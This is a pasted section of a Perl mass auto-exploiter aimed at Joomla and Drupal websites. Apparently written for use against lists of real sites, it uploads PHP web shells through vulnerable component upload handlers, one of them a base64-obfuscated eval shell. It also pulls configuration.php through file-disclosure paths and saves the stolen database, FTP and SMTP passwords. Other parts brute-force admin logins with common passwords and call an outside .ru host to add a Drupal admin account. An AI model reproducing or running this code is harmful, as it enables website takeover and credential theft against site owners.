  6696.             );
  6697.  
  6698. if ($response->content =~ /source: '(.*?)'/) {
  6699. $uploadfolder=$1;      
  6700.  
  6701. print color('bold red'),"[";
  6702. print color('bold green'),"+";
  6703. print color('bold red'),"] ";
  6704. print color('bold white'),"Com Blog";
  6705. print color('bold white')," .......................... ";
  6706. print color('bold green'),"VULN\n";
  6707. print color('bold green')," [";
  6708. print color('bold red'),"+";
  6709. print color('bold green'),"] ";
  6710. print color('bold white'),"shell Uploaded Successfully\n";
  6711. print color('bold white'),"  [Link] => $uploadfolder\n";
  6712.     open(save, '>>Result/shell.txt');  
  6713. print TEXT "$uploadfolder\n";
  6714. close (TEXT);
  6715. }else{
  6716. print color('bold red'),"[";
  6717. print color('bold green'),"+";
  6718. print color('bold red'),"] ";
  6719. print color('bold white'),"Com Blog";
  6720. print color('bold white')," .......................... ";
  6721. print color('bold red'),"Failed\n";
  6722. }
  6723. }
  6724. sub rocks(){
  6725.  
  6726. my $url = "$site/administrator/components/com_rokdownloads/assets/uploadhandler.php";
  6727.  
  6728. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => ['Filedata' => ["tool/XAttacker.php.xxxjpg"], "jpath" => "..%2F..%2F..%2F..%2F" ]);
  6729.  
  6730. $sexyup="$site/images/stories/XAttacker.php.xxxjpg?X=Attacker";
  6731.  
  6732. $checkpofxwup = $ua->get("$sexyup")->content;
  6733. if($checkpofxwup =~/X Attacker/) {     
  6734.  
  6735. print color('bold red'),"[";
  6736. print color('bold green'),"+";
  6737. print color('bold red'),"] ";
  6738. print color('bold white'),"rokdownloads";
  6739. print color('bold white')," ...................... ";
  6740. print color('bold green'),"VULN\n";
  6741. print color('bold green')," [";
  6742. print color('bold red'),"+";
  6743. print color('bold green'),"] ";
  6744. print color('bold white'),"shell Uploaded Successfully\n";
  6745. print color('bold white')," [Link] => $uploadfolder\n";
  6746.     open(save, '>>Result/shell.txt');  
  6747. print TEXT "$uploadfolder\n";
  6748. close (TEXT);
  6749. }else{
  6750. print color('bold red'),"[";
  6751. print color('bold green'),"+";
  6752. print color('bold red'),"] ";
  6753. print color('bold white'),"rokdownloads";
  6754. print color('bold white')," ...................... ";
  6755. print color('bold red'),"Failed\n";
  6756. }
  6757. }
  6758. sub sujks(){
  6759.  
  6760. my $url = "$site/administrator/components/com_extplorer/uploadhandler.php";
  6761. my $shell ="tool/XAttacker.php.xxxjpg";
  6762. my $field_name = "Filedata";
  6763.  
  6764. my $response = $ua->post( $url,
  6765.             Content_Type => 'multipart/form-data',
  6766.             Content => [ $field_name => ["$shell"] ]
  6767.            
  6768.             );
  6769.  
  6770. $sexyup="$site/images/stories/XAttacker.php.xxxjpg?X=Attacker";
  6771.  
  6772. $checkpofxwup = $ua->get("$sexyup")->content;
  6773. if($checkpofxwup =~/X Attacker/) {     
  6774.  
  6775. print color('bold red'),"[";
  6776. print color('bold green'),"+";
  6777. print color('bold red'),"] ";
  6778. print color('bold white'),"com_extplorer";
  6779. print color('bold white')," ..................... ";
  6780. print color('bold green'),"VULN\n";
  6781. print color('bold green')," [";
  6782. print color('bold red'),"+";
  6783. print color('bold green'),"] ";
  6784. print color('bold white'),"shell Uploaded Successfully\n";
  6785. print color('bold white')," [Link] => $uploadfolder\n";
  6786.     open(save, '>>Result/shell.txt');  
  6787. print TEXT "$uploadfolder\n";
  6788. close (TEXT);
  6789. }else{
  6790. print color('bold red'),"[";
  6791. print color('bold green'),"+";
  6792. print color('bold red'),"] ";
  6793. print color('bold white'),"com_extplorer";
  6794. print color('bold white')," ..................... ";
  6795. print color('bold red'),"Failed\n";
  6796. }
  6797. }
  6798.  
  6799. sub comusers(){
  6800.  
  6801. my $url = "$site/index.php?option=com_users&view=registration";
  6802. my $checkomusers = $ua->get("$url")->content;
  6803. if($checkomusers =~/jform_email2-lbl/) {
  6804. print color('bold red'),"[";
  6805. print color('bold green'),"+";
  6806. print color('bold red'),"] ";
  6807. print color('bold white'),"Com Users";
  6808. print color('bold white')," ......................... ";
  6809. print color('bold green'),"VULN\n";
  6810. print color('bold green')," [";
  6811. print color('bold red'),"+";
  6812. print color('bold green'),"] ";
  6813. print color('bold white'),"Exploit It It Manual\n";
  6814.     open(save, '>>Result/vulntargets.txt');  
  6815.     print save "[Com Users] $site\n";  
  6816.     close(save);
  6817. }else{
  6818. print color('bold red'),"[";
  6819. print color('bold green'),"+";
  6820. print color('bold red'),"] ";
  6821. print color('bold white'),"Com Users";
  6822. print color('bold white')," ......................... ";
  6823. print color('bold red'),"Failed\n";
  6824.     }
  6825. }
  6826.  
  6827.  
  6828. ################ comweblinks #####################
  6829. sub comweblinks(){
  6830.     $ua = LWP::UserAgent->new(keep_alive => 1);
  6831. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  6832. $ua->timeout (30);
  6833. $ua->cookie_jar(
  6834.         HTTP::Cookies->new(
  6835.             file => 'mycookies.txt',
  6836.             autosave => 1
  6837.         )
  6838.     );
  6839. $urlone ="$site/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=";
  6840. $token = $ua->get($urlone)->content;
  6841. if($token =~/<form action="(.*?)" id="uploadForm"/)
  6842. {
  6843. $url=$1;
  6844. }
  6845.  
  6846. my $index ="tool/XAttacker.gif";
  6847. my $field_name = "Filedata[]";
  6848.  
  6849. my $response = $ua->post( $url,
  6850.             Content_Type => 'form-data',
  6851.             Content => [ $field_name => ["$index"] ]
  6852.            
  6853.             );
  6854.  
  6855. $weblinksup= "$site/images/XAttacker.gif";
  6856. $check = $ua->get($weblinksup)->status_line;
  6857. if ($check =~ /200/){
  6858. print color('bold red'),"[";
  6859. print color('bold green'),"+";
  6860. print color('bold red'),"] ";
  6861. print color('bold white'),"Com Weblinks";
  6862. print color('bold white')," ...................... ";
  6863. print color('bold green'),"VULN\n";
  6864. print color('bold green')," [";
  6865. print color('bold red'),"+";
  6866. print color('bold green'),"] ";
  6867. print color('bold white'),"Picture Uploaded Successfully\n";
  6868. print color('bold white'),"  [Link] => $weblinksup\n";
  6869. open (TEXT, '>>Result/index.txt');
  6870. print TEXT "$weblinksup\n";
  6871. close (TEXT);
  6872. }else{
  6873. print color('bold red'),"[";
  6874. print color('bold green'),"+";
  6875. print color('bold red'),"] ";
  6876. print color('bold white'),"Com Weblinks";
  6877. print color('bold white')," ...................... ";
  6878. print color('bold red'),"Failed\n";
  6879. }
  6880. }
  6881.  
  6882. ################ mod_simplefileupload #####################
  6883. sub mod_simplefileupload(){
  6884.     $ua = LWP::UserAgent->new(keep_alive => 1);
  6885. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  6886. $ua->timeout (30);
  6887.  
  6888. $url ="$site/modules/mod_simplefileuploadv1.3/elements/udd.php";
  6889. $simplefileuploadsup= "$site/modules/mod_simplefileuploadv1.3/elements/XAttacker.php?X=Attacker";
  6890.  
  6891. my $shell ="tool/XAttacker.php";
  6892.  
  6893. my $response = $ua->post( $url, Content_Type => "multipart/form-data", Content => [ file=>["$shell"] , submit=>"Upload" ]);
  6894.  
  6895. $check = $ua->get($simplefileuploadsup)->content;
  6896. if ($check =~ /X Attacker/){
  6897. print color('bold red'),"[";
  6898. print color('bold green'),"+";
  6899. print color('bold red'),"] ";
  6900. print color('bold white'),"mod_simplefileupload";
  6901. print color('bold white')," .............. ";
  6902. print color('bold green'),"VULN\n";
  6903. print color('bold green')," [";
  6904. print color('bold red'),"+";
  6905. print color('bold green'),"] ";
  6906. print color('bold white'),"Shell Uploaded Successfully\n";
  6907. print color('bold white'),"  [Link] => $simplefileuploadsup\n";
  6908. open (TEXT, '>>Result/shells.txt');
  6909. print TEXT "$simplefileuploadsup\n";
  6910. close (TEXT);
  6911. }else{
  6912. print color('bold red'),"[";
  6913. print color('bold green'),"+";
  6914. print color('bold red'),"] ";
  6915. print color('bold white'),"mod_simplefileupload";
  6916. print color('bold white')," .............. ";
  6917. print color('bold red'),"Failed\n";
  6918. }
  6919. }
  6920. ################ mod_simplefileupload #####################
  6921. sub asxxdd(){
  6922. $ua = LWP::UserAgent->new(keep_alive => 1);
  6923. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  6924. $ua->timeout (30);
  6925.  
  6926. $url ="$site/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php";
  6927. $simplefileuploadsup= "$site/administrator/components/com_bt_portfolio/XAttacker.php?X=Attacker";
  6928.  
  6929. my $shell ="tool/XAttacker.php";
  6930.  
  6931. my $response = $ua->post( $url, Content_Type => "multipart/form-data", Content => [ Filedata=>["$shell"] , submit=>"Upload" ]);
  6932.  
  6933. $check = $ua->get($simplefileuploadsup)->content;
  6934. if ($check =~ /X Attacker/){
  6935. print color('bold red'),"[";
  6936. print color('bold green'),"+";
  6937. print color('bold red'),"] ";
  6938. print color('bold white'),"com_bt_portfolio";
  6939. print color('bold white')," .................. ";
  6940. print color('bold green'),"VULN\n";
  6941. print color('bold green')," [";
  6942. print color('bold red'),"+";
  6943. print color('bold green'),"] ";
  6944. print color('bold white'),"Shell Uploaded Successfully\n";
  6945. print color('bold white'),"  [Link] => $simplefileuploadsup\n";
  6946. open (TEXT, '>>Result/shells.txt');
  6947. print TEXT "$simplefileuploadsup\n";
  6948. close (TEXT);
  6949. }else{
  6950. print color('bold red'),"[";
  6951. print color('bold green'),"+";
  6952. print color('bold red'),"] ";
  6953. print color('bold white'),"com_bt_portfolio";
  6954. print color('bold white')," .................. ";
  6955. print color('bold red'),"Failed\n";
  6956. }
  6957. }
  6958. ################ com_jwallpapers fileupload #####################
  6959. sub comjwallpapers(){
  6960.     $ua = LWP::UserAgent->new(keep_alive => 1);
  6961. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  6962. $ua->timeout (30);
  6963.  
  6964. $url ="$site/index.php?option=com_jwallpapers&task=upload";
  6965. $comjwallpapersup= "$site/jwallpapers_files/plupload/XAttacker.php?X=Attacker";
  6966.  
  6967. my $shell ="tool/XAttacker.php";
  6968.  
  6969. my $response = $ua->post( $url, Content_Type => "multipart/form-data", Content => [ file=>["$shell"] , submit=>"Upload" ]);
  6970.  
  6971. $check = $ua->get($comjwallpapersup)->content;
  6972. if ($check =~ /X Attacker/){
  6973. print color('bold red'),"[";
  6974. print color('bold green'),"+";
  6975. print color('bold red'),"] ";
  6976. print color('bold white'),"comjwallpapers";
  6977. print color('bold white')," ................ ";
  6978. print color('bold green'),"VULN\n";
  6979. print color('bold green')," [";
  6980. print color('bold red'),"+";
  6981. print color('bold green'),"] ";
  6982. print color('bold white'),"Shell Uploaded Successfully\n";
  6983. print color('bold white'),"  [Link] => $comjwallpapersup\n";
  6984. open (TEXT, '>>Result/shells.txt');
  6985. print TEXT "$comjwallpapersup\n";
  6986. close (TEXT);
  6987. }else{
  6988. print color('bold red'),"[";
  6989. print color('bold green'),"+";
  6990. print color('bold red'),"] ";
  6991. print color('bold white'),"comjwallpapers";
  6992. print color('bold white')," .................... ";
  6993. print color('bold red'),"Failed\n";
  6994. }
  6995. }
  6996. ################ com_redmystic #####################
  6997. sub redmy(){
  6998. my $indexa='<?php eval(bAsE64_DecOde("ZWNobyAnaXpvY2luPGJyPicucGhwX3VuYW1lKCkuJzxmb3JtIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+Jy4nPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiPjwvZm9ybT4nOwppZiggJF9QT1NUWydfdXBsJ10gKXtpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICdVcGxvYWQgT0snO31lbHNlIHtlY2hvICdVcGxvYWQgRmFpbCc7fX0="));?>&field_id=3&form_id=1&gform_unique_id=../../../../uploads/gravity_forms/&name=izo.phtml';
  6999. my $url = "$site/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php?name=izo.php";
  7000. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  7001. $ua->timeout(10);
  7002. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  7003.  
  7004. my $gravityformsres = $ua->post($url, Content_Type => "multipart/form-data", Content => $indexa);
  7005.  
  7006. $gravityformsup = "$site/administrator/components/com_redmystic/chart/tmp-upload-images/izo.php";
  7007. my $checkk = $ua->get("$site/administrator/components/com_redmystic/chart/tmp-upload-images/izo.php")->content;
  7008. if($checkk =~/izocin/) {
  7009. print color('bold red'),"[";
  7010. print color('bold green'),"+";
  7011. print color('bold red'),"] ";
  7012. print color('bold white'),"com_redmystic";
  7013. print color('bold white')," ............... ";
  7014. print color('bold green'),"VULN\n";
  7015. print color('bold green')," [";
  7016. print color('bold red'),"+";
  7017. print color('bold green'),"] ";
  7018. print color('bold white'),"Shell Uploaded Successfully\n";
  7019. print color('bold white'),"[Link] => $gravityformsup\n";
  7020. open (TEXT, '>>Result/Shells.txt');
  7021. print TEXT "$gravityformsup\n";
  7022. close (TEXT);
  7023. }
  7024. else{
  7025. print color('bold red'),"[";
  7026. print color('bold green'),"+";
  7027. print color('bold red'),"] ";
  7028. print color('bold white'),"com_redmystic";
  7029. print color('bold white')," ..................... ";
  7030. print color('bold red'),"Failed";
  7031. print color('bold white'),"\n";
  7032. }
  7033. }
  7034. ################ com_jwallpapers fileupload #####################
  7035. sub facile(){
  7036.     $ua = LWP::UserAgent->new(keep_alive => 1);
  7037. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  7038. $ua->timeout (30);
  7039.  
  7040. $url ="$site/components/com_facileforms/libraries/jquery/uploadify.php";
  7041. $comjwallpapersup= "$site/components/com_facileforms/libraries/jquery/XAttacker.php?X=Attacker";
  7042.  
  7043. my $shell ="tool/XAttacker.php";
  7044.  
  7045. my $response = $ua->post( $url, Content_Type => "multipart/form-data", Content => [ Filedata=>["$shell"] , 'folder'=>'/components/com_facileforms/libraries/jquery/' ]);
  7046.  
  7047. $check = $ua->get($comjwallpapersup)->content;
  7048. if ($check =~ /X Attacker/){
  7049. print color('bold red'),"[";
  7050. print color('bold green'),"+";
  7051. print color('bold red'),"] ";
  7052. print color('bold white'),"comfacileforms";
  7053. print color('bold white')," ................ ";
  7054. print color('bold green'),"VULN\n";
  7055. print color('bold green')," [";
  7056. print color('bold red'),"+";
  7057. print color('bold green'),"] ";
  7058. print color('bold white'),"Shell Uploaded Successfully\n";
  7059. print color('bold white'),"  [Link] => $comjwallpapersup\n";
  7060. open (TEXT, '>>Result/shells.txt');
  7061. print TEXT "$comjwallpapersup\n";
  7062. close (TEXT);
  7063. }else{
  7064. print color('bold red'),"[";
  7065. print color('bold green'),"+";
  7066. print color('bold red'),"] ";
  7067. print color('bold white'),"comfacileforms";
  7068. print color('bold white')," .................... ";
  7069. print color('bold red'),"Failed\n";
  7070. }
  7071. }
  7072. ###### joom LFD SCAN ######
  7073. ######################
  7074. ########la##############
  7075. ######################
  7076. sub jomlfd(){
  7077. print color('bold red'),"[";
  7078. print color('bold green'),"+";
  7079. print color('bold red'),"] ";
  7080. print color('bold white'),"LFD and Config Backup";
  7081. print color('bold white')," ............. ";
  7082. print color('bold red'),"FiNDiNGG\n";
  7083. @patik=('/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','/index.php?jat3action=gzip&type=css&file=configuration.php','/modules/mod_dvfoldercontent/download.php?f=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=','/plugins/content/jw_allvideos/includes/download.php?file=../../../../configuration.php','/index.php?option=com_product_modul&task=download&file=../../../../../configuration.php&id=1&Itemid=1','/index.php?option=com_cckjseblod&task=download&file=configuration.php','/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php','/index.php?option=com_community&view=groups&groupid=1&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&Itemid=0','/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes','/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA=','/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php','/plugins/content/wd/wddownload.php?download=wddownload.php&file=../../../configuration.php','configuration.php~','configuration.php_bak','/configuration.php-bak');
  7084. foreach $pmak(@patik){
  7085. chomp $pmak;
  7086.  
  7087. $url = "$site/$pmak";
  7088. $req = HTTP::Request->new(GET=>$url);
  7089. $userAgent = LWP::UserAgent->new();
  7090. $response = $userAgent->request($req);
  7091. $ar = $response->content;
  7092. if($ar =~ m/JConfig/g){
  7093. print color('bold red'),"[";
  7094. print color('bold green'),"+";
  7095. print color('bold red'),"] ";
  7096. print color('bold white'),"joomla LFD & Config Bugs";
  7097. print color('bold white')," .......... ";
  7098. print color('bold green'),"VULN\n";
  7099. print color('bold green')," [";
  7100. print color('bold red'),"+";
  7101. print color('bold green'),"] ";
  7102. print color('reset');
  7103.     open(save, '>>Result/vulntargets.txt');  
  7104.     print save "[jomlfd] $site\n";  
  7105.     close(save);
  7106.             open (TEXT, '>>Result/databases.txt');
  7107.         print TEXT "$site\n[+]DATABASE INFO\n";
  7108.         close (TEXT);
  7109.         print color("white"),"\t[+]DATABASE INFO\n";
  7110.         if ($ar =~ /user = \'(.*?)\';/){
  7111.         print color("red"),"\t[-]Database User = $1 \n";
  7112.         print color 'reset';
  7113.         open (TEXT, '>>Result/databases.txt');
  7114.         print TEXT "[-]Database User = $1 \n";
  7115.         close (TEXT);
  7116.   }
  7117.         if ($ar =~ /password = \'(.*?)\';/){
  7118.         print color("red"),"\t[-]Database Password = $1 \n";
  7119.         print color 'reset';
  7120.         open (TEXT, '>>Result/databases.txt');
  7121.         print TEXT "[-]Database Password = $1\n";
  7122.         close (TEXT);
  7123.   }
  7124.         if ($ar =~ /db = \'(.*?)\';/){
  7125.         print color("red"),"\t[-]Database Name = $1 \n";
  7126.         print color 'reset';
  7127.         open (TEXT, '>>Result/databases.txt');
  7128.         print TEXT "[-]Database Name = $1\n";
  7129.         close (TEXT);
  7130.   }
  7131.         if ($ar =~ /host = \'(.*?)\';/){
  7132.         print color("red"),"\t[-]Database Host = $1 \n";
  7133.         print color 'reset';
  7134.         open (TEXT, '>>Result/databases.txt');
  7135.         print TEXT "[-]Database Host = $1\n";
  7136.         close (TEXT);
  7137.   }
  7138.  
  7139.  
  7140. print color("white"),"\t[+] FTP INFO\n";
  7141.         if ($ar =~ /ftp_host = \'(.*?)\';/){
  7142.         print color("red"),"\t[-]FTP Host = $1 \n";
  7143.         print color 'reset';
  7144.         open (TEXT, '>>Result/databases.txt');
  7145.         print TEXT "\n[+] FTP INFO\n[-]FTP Host = $1\n";
  7146.         close (TEXT);
  7147.   }
  7148.         if ($ar =~ /ftp_port = \'(.*?)\';/){
  7149.         print color("red"),"\t[-]FTP Port = $1 \n";
  7150.         print color 'reset';
  7151.         open (TEXT, '>>Result/databases.txt');
  7152.         print TEXT "[-]FTP Port = $1\n";
  7153.         close (TEXT);
  7154.   }
  7155.         if ($ar =~ /ftp_user = \'(.*?)\';/){
  7156.         print color("red"),"\t[-]FTP User = $1 \n";
  7157.         print color 'reset';
  7158.         open (TEXT, '>>Result/databases.txt');
  7159.         print TEXT "[-]FTP User = $1\n";
  7160.         close (TEXT);
  7161.   }
  7162.         if ($ar =~ /ftp_pass = \'(.*?)\';/){
  7163.         print color("red"),"\t[-]FTP Pass = $1 \n";
  7164.         print color 'reset';
  7165.         open (TEXT, '>>Result/databases.txt');
  7166.         print TEXT "[-]FTP Pass = $1\n\n";
  7167.         close (TEXT);
  7168.   }
  7169.  
  7170.  
  7171.  
  7172. print color("white"),"\t[+] SMTP INFO\n";
  7173.         if ($ar =~ /smtpuser = \'(.*?)\';/){
  7174.         print color("red"),"\t[-]SMTP User = $1 \n";
  7175.         print color 'reset';
  7176.         open (TEXT, '>>Result/databases.txt');
  7177.         print TEXT "[+] SMTP INFO\n[-]SMTP User = $1\n";
  7178.         close (TEXT);
  7179.   }
  7180.         if ($ar =~ /smtppass = \'(.*?)\';/){
  7181.         print color("red"),"\t[-]SMTP Password = $1 \n";
  7182.         print color 'reset';
  7183.         open (TEXT, '>>Result/databases.txt');
  7184.         print TEXT "[-]SMTP Password = $1\n";
  7185.         close (TEXT);
  7186.   }
  7187.         if ($ar =~ /smtpport = \'(.*?)\';/){
  7188.         print color("red"),"\t[-]SMTP Port = $1 \n";
  7189.         print color 'reset';
  7190.         open (TEXT, '>>Result/databases.txt');
  7191.         print TEXT "[-]SMTP Port = $1\n";
  7192.         close (TEXT);
  7193.   }
  7194.         if ($ar =~ /smtphost = \'(.*?)\';/){
  7195.         print color("red"),"\t[-]SMTP Host = $1 \n\n";
  7196.         print color 'reset';
  7197.         open (TEXT, '>>Result/databases.txt');
  7198.         print TEXT "[-]SMTP Host = $1\n";
  7199.         close (TEXT);
  7200.  
  7201. }
  7202.  
  7203. }else{
  7204. print color('bold red'),"[";
  7205. print color('bold green'),"+";
  7206. print color('bold red'),"] ";
  7207. print color('bold white'),"LFD & Config";
  7208. print color('bold white')," ...................... ";
  7209. print color('bold red'),"Failed\n";
  7210. }
  7211. }
  7212. }
  7213. ################joomla brute#######################################3
  7214. sub joomlabrute{
  7215. print color('bold red'),"[";
  7216. print color('bold green'),"+";
  7217. print color('bold red'),"] ";
  7218. print color('bold white'),"Start brute force";
  7219. print color('bold white')," ................. ";
  7220. print color('bold red'),"WAiTiNG\n";
  7221. $joomsite = $site . '/administrator/index.php';
  7222.  
  7223. $ua = LWP::UserAgent->new(keep_alive => 1);
  7224. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  7225. $ua->timeout (30);
  7226. $ua->cookie_jar(
  7227.         HTTP::Cookies->new(
  7228.             file => 'mycookies.txt',
  7229.             autosave => 1
  7230.         )
  7231.     );
  7232.  
  7233.  
  7234. $getoken = $ua->get($joomsite)->content;
  7235. if ( $getoken =~ /name="(.*)" value="1"/ ) {
  7236. $token = $1 ;
  7237. }else{
  7238. print "[-] Can't Grabb Joomla Token !\n";
  7239. next OUTER;
  7240. }
  7241.  
  7242.  
  7243. @patsj=('123456','123456789','admin123','demo','admin123123','admin123321','12345','112233','Admin','admin123456','123','1234','admin','password','root');
  7244. foreach $pmasj(@patsj){
  7245. chomp $pmasj;
  7246. $joomuser = admin;
  7247. $joompass = $pmasj;
  7248. print "\n[-] Trying: $joompass ";
  7249. $joomlabrute = POST $joomsite, [username => $joomuser, passwd => $joompass, lang =>en-GB, option => user_login, task => login, $token => 1];
  7250. $response = $ua->request($joomlabrute);
  7251.  
  7252. my $check = $ua->get("$joomsite")->content;
  7253. if ($check =~ /logout/){
  7254. print "- ";
  7255. print color('bold green'),"FOUND\n";
  7256. print color('reset');
  7257. open (TEXT, '>>Result/joompassword.txt');
  7258. print TEXT "$joomsite => User: $joomuser Pass: $joompass\n";
  7259. close (TEXT);
  7260. next OUTER;
  7261. }
  7262. }
  7263. }
  7264. ##########################################################
  7265. #drupal exploit coded by fallaeg gassrini xD thnx gass <3#
  7266. ##########################################################
  7267. sub drupal(){
  7268. $ua = LWP::UserAgent->new(keep_alive => 1);
  7269. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  7270. $ua->timeout (20);
  7271.  
  7272. # check the link of the exploit or you can download script from here : http://pastebin.com/wPAbtyJ4 and you upload it on you one shell :)
  7273. $drupalink = "http://oriflame-angela.ru/gassrini.php";
  7274. my $exploit = "$drupalink?url=$site&submit=submit";
  7275. $admin ="XAttacker";
  7276. $pass  ="XAttacker";
  7277. $dr = $site . '/user/login';
  7278. $red = $site . '/user/1';
  7279. my $checkk = $ua->get("$exploit")->content;
  7280. if($checkk =~/Success!/) {
  7281. print color('bold red'),"[";
  7282. print color('bold green'),"+";
  7283. print color('bold red'),"] ";
  7284. print color('bold white'),"Drupal Add Admin";
  7285. print color('bold white')," ................... ";
  7286. print color('bold green'),"VULN\n";
  7287. print color('bold green')," [";
  7288. print color('bold red'),"+";
  7289. print color('bold green'),"] ";
  7290. print color('bold white'),"URL : $dr\n";
  7291. print color('bold white'),"USER : $admin\n";
  7292. print color('bold white'),"PASS : $pass\n";
  7293. open (TEXT, '>>Result/drupal.txt');
  7294. print TEXT "\nURL : $dr\n";
  7295. print TEXT "USER : $admin\n";
  7296. print TEXT "PASS : $pass\n";
  7297. close (TEXT);
  7298. }else{
  7299. print color('bold red'),"[";
  7300. print color('bold green'),"+";
  7301. print color('bold red'),"] ";
  7302. print color('bold white'),"Drupal Add Admin";
  7303. print color('bold white')," ................... ";
  7304. print color('bold red'),"Failed\n";
  7305. drb();
  7306. }
  7307. }
  7308. sub drb{
  7309. print"[-] Starting brute force";
  7310. @patsd=('123456','admin123','123','1234','admin','password','root');
  7311. foreach $pmasd(@patsd){
  7312. chomp $pmasd;
  7313. $druser = admin;
  7314. $drupass = $pmasd;
  7315. print "\n[-] Trying: $drupass ";
  7316.  
  7317. $drupal = $site . '/user/login';
  7318. $redirect = $site . '/user/1';
  7319.  
  7320. $drupalbrute = POST $drupal, [name => $druser, pass => $drupass, form_build_id =>'', form_id => 'user_login',op => 'Log in', location => $redirect];
  7321. $response = $ua->request($drupalbrute);
  7322. $stat = $response->status_line;
  7323.     if ($stat =~ /302/){
  7324. print "- ";
  7325. print color('bold green'),"FOUND\n";
  7326. print color('reset');
  7327.  
  7328. open (TEXT, '>>Result.txt');
  7329. print TEXT "$drupal => User: $druser Pass: $drupass\n";
  7330. close (TEXT);
  7331. next OUTER;
  7332. }
  7333. }
  7334. }
  7335. sub flag {
  7336.     print "\n[*] izocin priv8 auto Exploiter v1.0 \n";
  7337.     print "[*] Coder : izocin\n";
  7338.     print "[+] Bug Founder : izocin\n";
  7339.     print "[+] Usage :\n";
  7340.     print "[REQUIRED] -u | urllist  (List with ftp hosts).\n";
  7341.     print "[REQUIRED] -t | threadnumber (Namber of fork).\n";
  7342.     print "\nExample: perl perl2020.pl -u urllist.txt -t 15 \n\n";
  7343.    
  7344. }
  7345. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top